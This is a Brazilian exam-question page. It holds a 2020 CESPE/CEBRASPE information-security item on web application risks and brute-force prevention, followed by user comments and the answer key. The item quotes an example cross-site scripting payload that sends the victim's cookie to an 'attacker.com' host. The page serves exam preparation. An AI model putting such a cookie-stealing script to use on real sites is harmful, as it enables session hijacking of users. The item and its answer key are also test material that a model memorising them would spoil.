SóProvas

ID
4849855
Banca
CESPE / CEBRASPE
Órgão
Ministério da Economia
Ano
2020
Provas
Disciplina
Segurança da Informação
Assuntos

Considere, ainda, que um atacante tenha alterado o parâmetro CC no browser pelo código a seguir.


><script>document.location=

'http://www.attacker.com/cgi-bin/cookie.cgi?

foo='+document.cookie</script>

Nesse caso, o risco de segurança da aplicação é a desserialização insegura.


Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

Alternativas
Comentários

  • CERTO

    Quebra de autenticação: se caracteriza quando a aplicação apresenta falhas em áreas como a saída de sessão (logout), gestão de palavras chave, expiração de sessões, sistemas do tipo “lembre- me”, questões secretas e atualizações de conta.

    Dentro do universo de autenticação e gerenciamento de sessões essas funções são consideradas menos importantes e, por essa razão, as mais atacadas. 

    Além das formas elencadas na questão, outra opção de prevenção é a autenticação em dois fatores, adotada pelo Google, por exemplo.

  • Assertiva C

    Limitar o número máximo de tentativas de autenticação falhadas, ou atrasar progressivamente essa operação, e registar todas as falhas e alertar os administradores quando detectados ataques de teste exaustivo ou de força bruta são formas de prevenir a quebra de autenticação.

    Ataque força Bruta

  • GABARITO: CERTO.

  • Basta recordar do seu celular ou cartão de credito, se uma pessoa erra varias vezes seguidas a senha, ele bloqueia o acesso.

    Ferramenta muito comum nos dias atuais.

  • Existem questões que querem aterrorizar o candidato. Nesta questão, nem vi o texto e acertei, mas se tivesse visto o texto antes de responder, daria uma sensação de derrota.

  • Quem nunca fez isso no celular do amigo, pra deixar ele sem celular por uns minutinhos... kkkk

  • Prevenir é uma palavra muito abrangente.. não tem referencia para comprovar esse tipo de informação.

  • Como que não justifica?

    Ataque de força bruta é o mesmo de você ficar tentando um monte de combinação. Ex: Você quer desbloquear o celular da sua mãe, você vai ficar tentando data de nascimento, cpf, data de nascimento do filho, do papagaio, até uma hora você acertar.

    Mas se aquele celular limitar, não tem como você tentar 30 vezes né.

    E se atrasar e avisar o usuário, sua mãe descobrirá e jaá vai vir te enquadrar

  • ataque de força bruta -> o atacante tenta advinhar o nome de um usuário ou senha por TENTATIVA/ERRO.

    Como ? Geralmente por meio do dicionário.

  • Têm regras de seguranças como firewall, iptables, caso usuário erre a senha mais de três vezes, o sistema trava e, depois de uma hora, o usuário tenta novamente o acesso. Isso é atrasar progressivamente a operação. Com isso, o administrador da rede analisa um possível ataque.